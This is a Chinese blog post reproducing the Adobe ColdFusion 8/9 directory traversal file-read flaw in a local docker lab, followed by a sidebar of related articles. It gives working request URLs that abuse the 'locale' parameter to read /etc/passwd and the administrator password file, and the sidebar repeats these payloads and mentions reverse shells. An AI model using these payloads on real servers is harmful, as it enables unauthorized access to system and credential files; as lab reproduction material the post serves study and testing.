iss版本服务器读取_Adobe ColdFusion 文件读取漏洞

最新推荐文章于 2023-04-24 11:15:13 发布
最新推荐文章于 2023-04-24 11:15:13 发布
阅读量178 收藏
点赞数
文章标签: iss版本服务器读取
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39833763/article/details/111653497
版权

    Adobe ColdFusion(直译:冷聚变),是一个商用的快速应用程序开发平台,在1995年由JJ Allaire开创。ColdFusion最初是为了创建能与数据库连接的网站而开发的。2.0版本(1996年推出)以后,它成为了一个全面的开发平台,包括一个集成开发环境以及功能全面的脚本语言。ColdFusion支持的CFML(ColdFusion Markup Language)是一种脚本语言,文件以*.cfm为文件名,在ColdFusion专用的应用服务器环境下运行。cfm文件被编译器翻译为对应的C++语言程序,然后运行并向浏览器返回结果。它的设计思想被一些人认为非常先进,被一些语言所借鉴。

    Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。

环境搭建

// 执行如下命令启动Adobe CouldFusion 8.0.1版本服务器:docker-compose up -d// 环境拉取完成,直接访问地址http://192.168.233.131:8500/CFIDE/administrator/enter.cfm// 可以看到初始化页面,输入密码admin,开始初始化整个环境。初始化较慢。

0eb221384601bcc73f54693317f7960a.png

5c9693a24f2e9241e84e4d4c4c9d671f.png

db9c8784b9739a700d70277822a03721.png

漏洞复现

// 直接访问该URL,即可读取文件 /etc/passwdhttp://192.168.233.131:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en

18b0d3d2e4f613b6d007519787f4ea3a.png

// 读取后台管理员密码http://192.168.233.131:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en

382d1b4e6997b9dbf3eda1591d3c9d1f.png

// 且基本会存在目录遍历http://192.168.233.131:8500/

23da15f358555d3221de828adfa52e70.png

weixin_39833763
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ISS.rar_ISS服务器_iss
09-22
3. **SMTP服务**:部分版本ISS还集成了SMTP服务器,可以用于邮件的发送。 4. **安全管理**:包括身份验证、授权、审计和防火墙集成,确保服务器和数据的安全。 5. **性能监控**:提供实时性能监控工具,帮助管理员...
CVE-2010-2816 复现+反弹shell
weixin_45695535的博客
05-03 1714
整体过程漏洞描述一、复现过程环境复现1.解密2.根据js找到加密逻辑反弹shell1.一句话木马方式2.计划任务反弹shell参考文章 漏洞描述 Adobe ColdFusion 是美国 Adobe 公司的一款动态 Web 服务器产品,其运行的 CFML(ColdFusion Markup Language)是针对 Web 应用的一种程序设计语言。 Adobe ColdFusion 8、9 版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。 一、复现过程 环境 一台攻击机(kali-20
渗透测试红队手册
maverickpig的博客
03-20 2568
渗透测试自学日志,开始学习怎么挖掘src,然后。 免责声明 该文章仅用于信息防御技术的交流和学习,请勿用于其他用途; 在未得到网站授权前提下,禁止对政府、事业单位、企业或其他单位网站及系统进行渗透测试;技术是把双刃剑,请遵纪守法,做一名合格的白帽子安全专家,为国家的网络安全事业做出贡献; 本文基本上是转载qwsn专栏的内容,该专栏是暗月教程的笔记,大家可以关注下。我感觉暗月的教程特别系统,有条件的 ...
7天学习Go语言-尾声+一次险些翻车的任意文件读取漏洞小记
weixin_48421613的博客
03-07 467
接口 接口的定义 接口(interface )类型是对其他类型行为的概括和抽象,接口类型定义了一组方法,但是不包括这些方法的具体实现 接口本质是一种指针类型,可以实现多态功能。如果一个类型实现了某个接口,则所有使用这个接口的地方都支持这种类型的值。接口的定义格式如下: type 接口名称 interface { method1 (参数列表) 返回值列表 method2 (参数列表) 返回值列表 } 例如: type Num interface { Eq (i Num) bool } 如果接口没有任何方
go语言重大bug,make缓存读取数据漏洞,4096漏洞
咸甜适中
02-09 1357
做一个小程序,需要对文件内容分片读取,但是读取过程中发现数据读取不全,经测试多个make缓存读取文件时发现问题。 一、生成测试文件(AAA.txt) // 创建一个AAA.txt文件,写入1万个A wFile, _ := os.OpenFile("AAA.txt", os.O_WRONLY|os.O_CREATE, 0666) defer wFile.Close() for i := 0; i < 10000; i++ { wFile.WriteString("A") } 二、多缓存读
golang 循环读取目录php文件得到bug
a1658616397的博客
12-12 221
package main import ( "bufio" "encoding/json" "fmt" "io" "io/ioutil" "net/http" "os" "strings" "time" ) type M struct { Code int `json:"code"` } type R struct { Url...
C++ 读取文件内容到指定类型的变量方法
08-27
C++ 读取文件内容到指定类型的变量方法 本文档旨在为读者提供一个C++ 读取文件内容到指定类型的变量方法的详细介绍。下面将对标题、描述、标签和部分内容进行逐一解释,并提供相关的知识点。 标题:C++ 读取文件...
ISS.rar_Loaded_jvcl iss
09-21
The source for the CompInstall.dll can be found in github ....1. Extract the zip-archive. 2. Open the package file appropriate to your Delphi version (ending with ".dpk") in the Delphi IDE. ...
iss_l12.rar_文件操作_matlab_
08-12
标题中的“iss_l12.rar_文件操作_matlab_”暗示了这是一个关于使用MATLAB进行文件操作的资源,特别是与“iss_l12”相关的项目或数据集。在这个上下文中,“l12”可能指的是某种实验、课程或者特定的数据系列。而...
C++_C++_读取txt文档_txt内容读取_按空格分隔_按逗号分隔_
10-01
在C++编程中,读取txt文档是一项基本且常见的任务,尤其在处理数据或日志文件时。本篇文章将详细讲解如何使用C++来读取txt文档,并按空格和逗号进行内容分隔。 首先,我们需要理解C++中文件I/O的基础。C++提供了...
Coldfusion8 读取HASH工具
weixin_30708329的博客
01-05 117
#!/usr/bin/env python #-*- coding:utf-8 -*- import sys import threading import urllib import httplib class Mythread(threading.Thread): def __init__(self,host): threa...
coldfusion文件读取漏洞(CVE-2010-2861)
1stPeak's Blog
07-28 880
1、直接访问http//your-ip8500/CFIDE/administrator/enter.cfm?/etc/passwd%00en,即可读取文件/etc/passwd。2、读取后台管理员密码http//your-ip8500/CFIDE/administrator/enter.cfm?/lib/password.properties%00enAdobeColdFusion8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。解密password。...
GoLang 的 bufio.NewScanner 按行读取文件的坑
JineD的博客
06-24 3761
首先从一个日志分析的Go程序说起,基本功能就是一行一行读取数据并处理。代码大体是这样的: func main() { scanner := bufio.NewScanner(os.Stdin) for scanner.Scan() { line := scanner.Text() if err := deal(line); err != nil { log.Println(line) } } } 因为数据是用h
golang 读取文件 newscanner 文件_Golang 读取文件的几种方式
weixin_30444111的博客
01-20 1454
一、一次性读取全部文件 1、使用 os 包配合 ioutil 包读取package main import ( "fmt" "io/ioutil" ) func main() { file, err := os.Open("/yourPath/test.txt") if err != nil { panic(err.Error()) ...
golang bufio.newscanner如何超时跳出_GoLang中的Context
weixin_39611937的博客
12-27 101
GoLang中的Context1. 背景我们在开发Golang中的应用时,通常会使用Contexts来控制和管理所依赖的应用中非常重要的数据,例如并发编程中的cancellation和data share。在GoLang中,context作为context的交互的入口,它被认为GoLang中非常重要一个包。假如当前你还没有遇到与context相关的操作,那么,相信在不久的将来也肯定会遇到,它的使用...
Golang 按行读取文件的 3 种方法
Dablelv 的博客专栏。
04-24 5988
Golang 是一种现代的编程语言,它具有高效、简洁和可扩展等特点,因此在各种领域广泛应用。在 Golang 中,读取文件是一个常见的操作。在本篇技术博客中,我将介绍如何在 Golang 中按行读取文件
CVE-2010-2861(Adobe ColdFusion 文件读取漏洞
浅笑996的博客
11-27 2594
漏洞介绍 Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。 Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。 环境搭建 https://blog.csdn.net/qq_36374896/article...
Adobe ColdFusion 文件读取漏洞(CVE-2010-2861)
时光凉春衫薄的博客
12-06 263
Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。 Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。 产品样子: 漏洞复现 登录界面?后边locale=../../../../../../../../../../etc/passwd%00en即可 读取后台用户密码 locale=../../..
c++读取 config.ini配置文件读取中文吗
最新发布
06-02
使用标准库 \<fstream\> 和 \<sstream\> 读取配置文件时,可以读取中文,但需要注意编码问题。 假设配置文件 config.ini 的内容如下: ``` [database] host = localhost port = 3306 username = root password = ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值